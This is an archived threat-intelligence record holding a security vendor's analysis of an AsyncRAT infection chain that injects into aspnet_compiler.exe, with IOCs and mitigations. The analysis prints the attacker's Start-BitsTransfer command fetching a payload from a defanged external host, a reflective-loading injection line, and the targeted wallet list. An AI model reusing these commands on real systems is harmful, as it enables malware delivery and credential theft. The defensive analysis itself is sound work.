{
	"id": "e03b899e-f4a7-45c4-9a82-398407006d28",
	"created_at": "2026-04-06T01:29:08.985593Z",
	"updated_at": "2026-04-10T03:37:08.521248Z",
	"deleted_at": null,
	"sha1_hash": "c9393e6bb571fb81a77514becc39f8dbe58fe895",
	"title": "Analyzing AsyncRAT's Code Injection into Aspnet_Compiler.exe Across Multiple Incident Response Cases",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1658056,
	"plain_text": "Analyzing AsyncRAT's Code Injection into Aspnet_Compiler.exe Across Multiple Incident Response Cases\r\nBy Buddy Tancio, Fe Cureg, Maria Emreen Viray\r\nPublished: 2023-12-11 · Archived: 2026-04-06 01:02:02 UTC\r\nMalware\r\nThis blog entry delves into MxDR's unraveling of the AsyncRAT infection chain across multiple cases, shedding light on the misuse of aspnet_compiler.exe, a legitimate Microsoft process originally designed for precompiling ASP.NET web applications.\r\nBy: Buddy Tancio, Fe Cureg, Maria Emreen Viray Dec 11, 2023 Read time: 11 min (2917 words)\r\nDuring our recent investigations, the Trend Micro Managed XDR services (MxDR) team handled various cases involving AsyncRAT, a Remote Access Tool (RAT) with multiple capabilities, such as keylogging and remote desktop control, that make it a substantial threat to victims. This blog entry delves into MxDR's unraveling of the AsyncRAT infection chain across multiple cases, shedding light on the misuse of aspnet_compiler.exe, a legitimate Microsoft process originally designed for precompiling ASP.NET web applications. Malicious actors exploited this process to inject the AsyncRAT payload, showing evolving adversary tactics.\r\nEarlier this year, our internal Threat Hunting team also encountered ransomware infections that cleverly used AsyncRAT's capabilities, with tactics, techniques, and procedures (TTPs) resembling the ones we will discuss in this blog entry, effectively bypassing antivirus defenses. The attackers then employed reflective loading through the aspnet_compiler.exe process, allowing them to discreetly deploy their payloads.\r\nVarious research studies have scrutinized AsyncRAT infections, revealing the adaptability of its operators in employing different techniques. 
For instance, campaigns in 2019 and 2020 distributed modified versions of AsyncRAT with a Covid-19 theme, capitalizing on the pandemic during its early period. In another case, malicious actors impersonated local banks and law enforcement institutions to deliver AsyncRAT to their targets.\r\nIn 2021, AsyncRAT was part of a phishing campaign called Operation Spalax. The phishing campaigns, which persisted until late 2021 and early 2022, employed HTML attachments for AsyncRAT delivery while also integrating reflective loading techniques. These incidents underline the malware's versatility and sustained use across diverse attack vectors.\r\nThe pivot point\r\nTime elapsed | Activity\r\nT0 | User downloaded the password-protected ZIP file downloadedFile_SSAfnmeddOFzc.zip\r\n1 minute and 20 seconds | User extracted the ZIP file that contains a .wsf script\r\n1 minute and 26 seconds | The first payload is downloaded and executed, leading to the download of the second payload\r\n1 minute and 35 seconds | Autostart is created\r\n1 minute and 59 seconds | The second payload is downloaded and executed\r\n5 minutes and 48 seconds | Process injection to aspnet_compiler.exe and command-and-control (C\u0026C) connection via dynamic DNS\r\nTable 1. Timeline of events\r\nOur investigation began with a workbench alert triggered by Trend Vision One’s Workbench, an application that showcases alerts triggered by detection models, enabling the MxDR team to assess and prioritize alerts for further investigation.\r\nFigure 1 depicts the detection of suspicious activity involving aspnet_compiler.exe, which attempted to establish a connection with the external IP address 45[.]141[.]215[.]40. Simultaneously, our analysis reveals the execution of concerning PowerShell scripts and a batch file in close proximity. 
We were able to use this data as a pivot point to backtrack and investigate the entry point of the file and its additional activities.\r\nWe discovered that the trigger for the infection was a file initially downloaded through Google Chrome named downloadedFile_SSAfnmeddOFzc.zip.\r\n\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"\r\nC:\\Users\\\u003cusername\u003e\\Downloads\\downloadedFile_SSAfnmeddOFzc.zip\r\nThe user then opened the ZIP file, which contained a script file named downloadedFile_SSAfnmedd.wsf. We collected the ZIP file and found that it was password-protected.\r\nBased on recent reports, AsyncRAT typically arrives via spam mail. We strongly suspect that the user may have received a password for decompressing the ZIP file, along with a malicious link. The user extracted and opened the file using the password, highlighting a common tactic employed by threat actors to circumvent detection — using the included password in the email to extract ZIP files.\r\nC:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\Temp923a29cc-d4fd-4950-9b7d-801ff92f7bea_downloadedFile_SSAfnmeddOFzc.zip\\downloadedFile_SSAfnmeddOFzc.wsf\r\nExamining the execution profile reveals wscript.exe being initiated via Windows Explorer, suggesting that the user executed the file by double-clicking it. The installation sequence involves the creation and execution of multiple PowerShell scripts (.ps1), VBScript (.vbs), and Batch files (.bat). 
\r\nBy using Antimalware Scan Interface (AMSI) telemetry (TELEMETRY_AMSI_EXECUTE), we gained insight into the data associated with downloadedFile_SSAfnmeddOFzc.wsf in runtime, enabling us to discern the file's purpose and its corresponding activities.\r\nIHost.CreateObject(\"WScript.Shell\");|\r\nIFileSystem3.CreateTextFile(\"C:\\Users\\Public\\VLCdllFrame.xml\", \"true\");\r\nITextStream.Write(\"\u003ccommand\u003e   \u003ca\u003e      \u003cexecute\u003eStart-BitsTransfer -Source\r\n\"hxxp://185[.]81[.]157[.]246:222/dd/mc.jpg\" -Destination \"C:\\Users\\Public\\snakers.zip\"; Expand-Archive -Path\r\n\"C:\\Users\\Public\\snakers.zip\" -DestinationPath \"C:\\Users\\Public\\\" -Fo\");\r\nITextStream.Close();\r\nIHost.CreateObject(\"WScript.Shell\");\r\nIFileSystem3.CreateTextFile(\"C:\\Users\\Public\\VLCdllFrame.xml\", \"true\");\r\nITextStream.Write(\"\u003ccommand\u003e   \u003ca\u003e      \u003cexecute\u003eStart-BitsTransfer -Source\r\n\"hxxp://185[.]81[.]157[.]246:222/dd/mc.jpg\" -Destination \"C:\\Users\\Public\\snakers.zip\"; Expand-Archive -Path\r\n\"C:\\Users\\Public\\snakers.zip\" -DestinationPath \"C:\\Users\\Public\\\" -Fo\");\r\nITextStream.Close();\r\nIWshShell3.Run(\"powershell -command \"[xml]$xmldoc = Get-Content 'C:\\Users\\Public\\VLCdllFra\", \"0\", \"true\");\r\nIHost.CreateObject(\"WScript.Shell\");\r\nIFileSystem3.CreateTextFile(\"C:\\Users\\Public\\VLCdllFrame.xml\", \"true\");\r\nITextStream.Write(\"\u003ccommand\u003e   \u003ca\u003e      \u003cexecute\u003eStart-BitsTransfer -Source\r\n\"hxxp://185[.]81[.]157[.]246:222/dd/mc.jpg\" -Destination \"C:\\Users\\Public\\snakers.zip\"; Expand-Archive -Path\r\n\"C:\\Users\\Public\\snakers.zip\" -DestinationPath \"C:\\Users\\Public\\\" -Fo\");\r\nITextStream.Close();\r\nIWshShell3.Run(\"powershell -command \"[xml]$xmldoc = Get-Content 
'C:\\Users\\Public\\VLCdllFra\", \"0\", \"true\");\r\nIFileSystem3.DeleteFile(\"C:\\Users\\Public\\VLCdllFrame.xml\");\r\nThe script downloadedFile_SSAfnmeddOFzc.wsf is a Windows Script File (.wsf) that uses a mix of PowerShell and VBScript commands to execute a series of actions. It creates a WScript.Shell object, commonly used for executing shell commands, and generates a text file named VLCdllFrame.xml in the C:\\Users\\Public directory. The “true” value as the second parameter indicates that the file will be overwritten if it already exists.\r\nThe script uses the Start-BitsTransfer command to download a file from hxxp://185[.]81[.]157[.]246:222/dd/mc.jpg, saving it as snakers.zip. Subsequently, it extracts the contents into either the C:\\Users\\Public directory or, in some cases, into C:\\Users\\Public\\Pictures\\. Following the execution of the PowerShell command, the script deletes the previously created VLCdllFrame.xml file.\r\nWe collected snakers.zip and analyzed its contents, which revealed the presence of various malicious scripts, all integral components of the AsyncRAT installation routine.\r\nComponent | SHA256 hash | Detection name\r\nC:\\Users\\Public\\Webcentral.vbs | 50b6aaed93609360f33de4b40b764d3bb0bd45d1 | Trojan.VBS.RUNNER.AOE\r\nC:\\Users\\Public\\Webcentral.bat | f22cceb9c6d35c9119a5791d6fd93bf1484e6747 | Trojan.BAT.POWRUN.AA\r\nC:\\Users\\Public\\hash.vbs | 2226d90cce0e6f3e5f1c52668ed5b0e3a97332c1 | Trojan.VBS.RUNNER.AOE\r\nC:\\Users\\Public\\hash.bat | 8fe5c43704210d50082bbbaf735a475810a8dbc9 | Trojan.BAT.POWRUN.AA\r\nC:\\Users\\Public\\Webcentral.ps1 | 7be69e00916c691bbbed6ff9616f974f90234862 | Trojan.PS1.RUNNER.GBT\r\nC:\\Users\\Public\\runpe.txt | c07b2c25f926550d804087ac663991cf06bac519 | Trojan.Win32.ASYNCRAT.ENC\r\nC:\\Users\\Public\\msg.txt | c5b16f22397c201a6e06f0049b6f948c648f11b7 | Trojan.Win32.ASYNCRAT.ENC\r\nC:\\Users\\Public\\hash.ps1 | 899ca79e54a2d4af140a40a9ca0b2e03a98c46cb | 
Trojan.PS1.ASYNCRAT.L\r\nTable 2. The components of the AsyncRAT installation routine\r\nFigure 4 depicts the execution profile generated by Vision One, illustrating the sequence of events in the AsyncRAT installation routine triggered when the user opened the file downloadedFile_SSAfnmeddOFzc.wsf.\r\nWe observed aspnet_compiler.exe establishing connections to the IP addresses 208[.]95[.]112[.]1:80 (ip-api[.]com) and 45[.]141[.]215[.]40:4782 (httpswin10[.]kozow[.]com). The former is used for geolocation checks, while the latter — identified as a free dynamic DNS — is likely employed by malicious actors to obfuscate their true server IP address, enabling quick changes to evade detection. In other cases, it was seen connecting to 66escobar181[.]ddns[.]net, another dynamic DNS server.\r\nScheduled tasks were created with the task names Reklam or Rekill, providing AsyncRAT persistence capabilities. Figure 6 shows the contents of Webcentral.ps1, the script responsible for creating a scheduled task that executes C:\\Users\\Public\\hash.vbs or C:\\Users\\Public\\Pictures\\hash.vbs every two minutes using the Windows Task Scheduler service.\r\nAnalyzing the Scripts\r\nBy analyzing the scripts, we were able to gain deeper insights into the threat's objectives. The diagram shown in Figure 8 illustrates how the threat strategically employs multiple layers of scripts as a means of evading detection. 
Subsequently, it proceeds to perform code injection into aspnet_compiler.exe, representing another method of staying undetected.\r\nIn this section, we will discuss the objectives of each script extracted from snakers.zip.\r\nThe Webcentral.vbs script checks if it is running with administrative privileges using the net session command (lines 9-10). If it succeeds, it flags to the attacker that administrative rights are present (isAdmin), and then runs a command stored in the variable executionCommand, directing it to a batch file (C:\\Users\\Public\\Webcentral.bat). The script includes error-handling techniques, using the On Error Resume Next and On Error GoTo 0 syntaxes to manage errors and keep the script running smoothly.\r\nThe Webcentral.bat script initiates a PowerShell execution of the script located at C:\\Users\\Public\\Webcentral.ps1. It employs the -NoProfile, -WindowStyle Hidden, and -ExecutionPolicy Bypass parameters to run PowerShell in a hidden window with the bypassed execution policy.\r\nThe Webcentral.ps1 script creates a scheduled task named Reklam that runs a script (hash.vbs) every two minutes. The scheduled task is enabled and can start even if the device is running on batteries. The hash.vbs script, located at C:\\Users\\Public\\hash.vbs, is executed as an action of the scheduled task. The task is registered using the Windows Task Scheduler service. 
\r\nHash.vbs is the same script as Webcentral.vbs but directs to a different file (C:\\Users\\Public\\hash.bat).\r\nSimilar to Hash.vbs, Hash.bat is the same script as Webcentral.bat but directs to a different file (C:\\Users\\Public\\hash.ps1).\r\nHash.ps1 decodes and loads portable executable (PE) files encoded in msg.txt and runpe.txt, triggering the execution of aspnet_compiler.exe. It employs functions from the decoded runpe.txt to inject the AsyncRAT payload (the decoded msg.txt) into the newly spawned aspnet_compiler.exe process.\r\nThe decoded script can be seen below:\r\n[System.Reflection.Assembly]::Load($decoded_runpe_payload).GetType('NewPE2.PE').GetMethod('Execute').'Invoke'.Invoke($nu\r\n[object[]]('C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe', $decoded_msg_payload))\r\nThis is a PowerShell script that dynamically loads a .NET assembly, specifically the NewPE2.PE type, and invokes its Execute method. The Execute method injects the supplied payload into the aspnet_compiler.exe process. It is designed for malicious code injection, allowing malicious actors to execute additional code within the context of the legitimate aspnet_compiler.exe process.\r\nThe decoded content of the runpe.txt file, seen in Figure 12, shows a look into the code used in the hash.ps1 script for executing process injection into aspnet_compiler.exe.\r\nIn the decoded config at the beginning of the routine, the notable values are the hostname 66escobar181[.]ddns[.]net and the port number 6666, which it connects to.\r\nOther capabilities\r\nThe AsyncRAT backdoor has other capabilities depending on the embedded configuration. 
This includes anti-debugging and analysis checks, persistence installation, and keylogging. The code snippet in Figure 13 checks if keylogging is enabled in the embedded configuration embeddedConfig. If keylogging is enabled, it starts a new thread to execute the startKeylogging method.\r\nFor the sample file that we acquired, only the keylogging routine was enabled, which captures and records every keystroke of the infected machine and sends the data to the attacker-controlled server.\r\nThe keylogging routine ends by logging the captured key together with the name of the associated program (getActiveApplicationName()). This information is written to a specified log file in the temporary directory, %TEMP%\\Log.tmp.\r\nThe code snippet dynamically selects a host and port from the configuration. AsyncRAT employs a socket connection to interact with various IP addresses and ports, making its infrastructure dynamic and adaptable. It allows threat actors to change server addresses frequently, complicating efforts to predict or block communication channels. Furthermore, the code includes error-handling mechanisms: if there's an issue with connecting to a specific IP address or port, the error-handling mechanisms allow AsyncRAT to attempt alternative connections or fall back to default configurations, further emphasizing the evasive tactics employed by the attackers.\r\nThe AsyncRAT payload gathers client information as it connects to its server. This notably includes usernames, computer information, installed AV software and installed cryptocurrency wallets. 
\r\nAsyncRAT scans specific folders within the application directory, browser extensions, and user data to identify folder names associated with particular crypto wallets, verifying their presence in the system.\r\nThe code snippet of the crypto wallet-checking prologue conducts queries for certain directories relating to the following wallet strings:\r\nAtomic\r\nBinance\r\nBinanceEdge\r\nBitcoinCore\r\nBitKeep\r\nBitPay\r\nCoinbase\r\nCoinomi\r\nElectrum\r\nExodus\r\nF2a\r\nLedgerLive\r\nMeta\r\nPhantom\r\nRabbyWallet\r\nRonin\r\nTronLink\r\nTrust\r\nRecent trends in AsyncRAT infections\r\nAs of early 2023, AsyncRAT infections still persist, employing various file types, including PowerShell, Windows Script File (WSF), and VBScript (VBS) to bypass antivirus detection measures. Notably, Any.run consistently reports AsyncRAT ranking among the top ten weekly malware trends over the past few months.\r\nOur recent investigations align with this trend, although there are nuanced differences in the dropped scripts, utilized domains, and observed injection processes. Despite these changes in tactics, one consistent aspect is the use of dynamic DNS (DDNS) services — such as those provided by No-IP and DuckDNS — for network infrastructure.\r\nAnalyzing the decrypted AsyncRAT payload, it becomes evident that the certificate employed is associated with AsyncRAT Server, a characteristic trait of AsyncRAT C\u0026C traffic. Typically, the Subject Common Name is configured as either \"AsyncRAT Server\" or \"AsyncRAT Server CA\" (as mentioned in our previous technical brief on SSL/TLS communications). Examining the Subject Common Name proves valuable in identifying AsyncRAT infections.\r\nThe malware configuration reveals the presence of the ID 3LOSH RAT. 
This implies that the payload may have utilized the 3LOSH crypter for obfuscation and stealth, potentially explaining the use of multiple scripts across different stages of the infection chain. The previous research from Talos showed similar instances where such infections leverage the elusiveness provided by crypters to enhance operational efficiency.\r\nDuring our investigation of the AsyncRAT sample files, we identified code similarities between the injection code used for aspnet_compiler.exe and an open-source repository on GitHub. Two notable distinctions emerged between the AsyncRAT sample obtained from our customer's environment and the version on the GitHub repository. First, our acquired sample includes BoolWallets as one of the scanned cryptocurrency wallets. Second, the GitHub version lacks keylogging capabilities. The code we acquired, however, exhibits keylogging functionalities, resembling another sample found in the GitHub repository. These variances suggest that the attacker customized the GitHub code to align with their specific goals.\r\nExploring Dynamic DNS Usage\r\nDynamic DNS allows threat actors to swiftly change the IP address associated with a domain name, posing a challenge for security systems attempting to detect and block malicious activities. Our recent investigations have unveiled C\u0026C domains registered under No-IP and Dynu Systems, Inc. One domain, 66escobar181[.]ddns[.]net, resolved to the IP address 185[.]150[.]25[.]181. VirusTotal analysis indicates multiple domains flagged as malicious, all converging to the same IP address.\r\nFurther scrutinizing the IP information, we find an association with the hosting provider Zap-Hosting, which is known for offering diverse services such as game servers, websites, and virtual private servers (VPS). 
A similar pattern emerges with the other domain (httpswin10[.]kozow[.]com), which resolves to an IP address associated with a hosting provider. This IP address is also shared with other malicious domains, indicating a consistent strategy by malicious actors to leverage DDNS and hosting providers for their operations. This underscores the deliberate efforts to obfuscate their activities and highlights the persistent challenges in tracking and mitigating threats associated with AsyncRAT.\r\nConclusion and Recommendations\r\nThis blog entry shows how AsyncRAT, a remote access trojan with features such as unauthorized access, keylogging, remote desktop control, and covert file manipulation, serves as a versatile tool for various threats, including ransomware.\r\nThe strategic use of multiple obfuscated scripts that incorporate \"living off the land\" techniques grants malicious actors flexibility, enabling them to evade detection. Coupled with code injection into legitimate files like aspnet_compiler.exe, this technique significantly increases the challenge of detecting these threats.\r\nFurthermore, the use of dynamic host servers allows threat actors to seamlessly update their IP addresses, strengthening their ability to remain undetected within the system. AsyncRAT’s default purpose remains intact in many cases — to covertly exfiltrate valuable information such as usernames, passwords, and cryptocurrency wallets. Keystrokes captured via keylogging enable attackers to harvest credentials and potentially access financial accounts.\r\nThis case highlights the significance of continuous monitoring services like Trend MxDR services. 
The early detection of the AsyncRAT allowed the team to prevent it from causing additional harm to the customer’s environment, potentially avoiding ransomware infection, a scenario AsyncRAT has historically been capable of.\r\nHere are some mitigation and prevention strategies that an organization can employ for such attacks:\r\nBehavior monitoring observes the runtime behavior of scripts and other executable code. It analyzes actions taken by scripts during execution, identifying deviations from expected behavior.\r\nWeb reputation services maintain databases of known malicious URLs and domains. They assess the reputation of web entities, preventing users from accessing sites associated with malicious scripts.\r\nRestricting or disabling the execution of VBScript and PowerShell scripts for specific users who don’t need this function can help limit an attacker’s ability to leverage scripts for malicious activities.\r\nGiven the persistent and evolving nature of threats like AsyncRAT, it is important to implement robust 24/7 monitoring services, such as MxDR, for proactive threat detection and prevention. The ability to promptly respond to potential breaches not only mitigates the impact on the targeted environment but also prevents the escalation of threats, such as ransomware infections.\r\nImplementing robust email security measures can help in blocking AsyncRAT infections delivered through spam emails, preventing users from clicking on malicious links or downloading malicious files. Email security serves as an additional data source for MxDR investigations, providing comprehensive visibility into the point of entry for the threat. 
In this case, our customers lacked email security or were using third-party email security, hindering our ability to pinpoint the specific email message as the source.\r\nUsers should be taught about the risks of downloading and executing scripts from unknown or untrusted sources, especially those that come bundled with email attachments and links.\r\nIndicators of Compromise\r\nThe indicators of compromise for this entry can be viewed here.\r\nSource: https://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html"
	],
	"report_names": [
		"analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html"
	],
	"threat_actors": [
		{
			"id": "64d750e4-67db-4461-bae2-6e75bfced852",
			"created_at": "2022-10-25T16:07:24.01415Z",
			"updated_at": "2026-04-10T02:00:04.839502Z",
			"deleted_at": null,
			"main_name": "Operation Spalax",
			"aliases": [],
			"source_name": "ETDA:Operation Spalax",
			"tools": [
				"AsyncRAT",
				"Bladabindi",
				"Jorik",
				"Remcos",
				"RemcosRAT",
				"Remvio",
				"Socmer",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775438948,
	"ts_updated_at": 1775792228,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c9393e6bb571fb81a77514becc39f8dbe58fe895.pdf",
		"text": "https://archive.orkl.eu/c9393e6bb571fb81a77514becc39f8dbe58fe895.txt",
		"img": "https://archive.orkl.eu/c9393e6bb571fb81a77514becc39f8dbe58fe895.jpg"
	}
}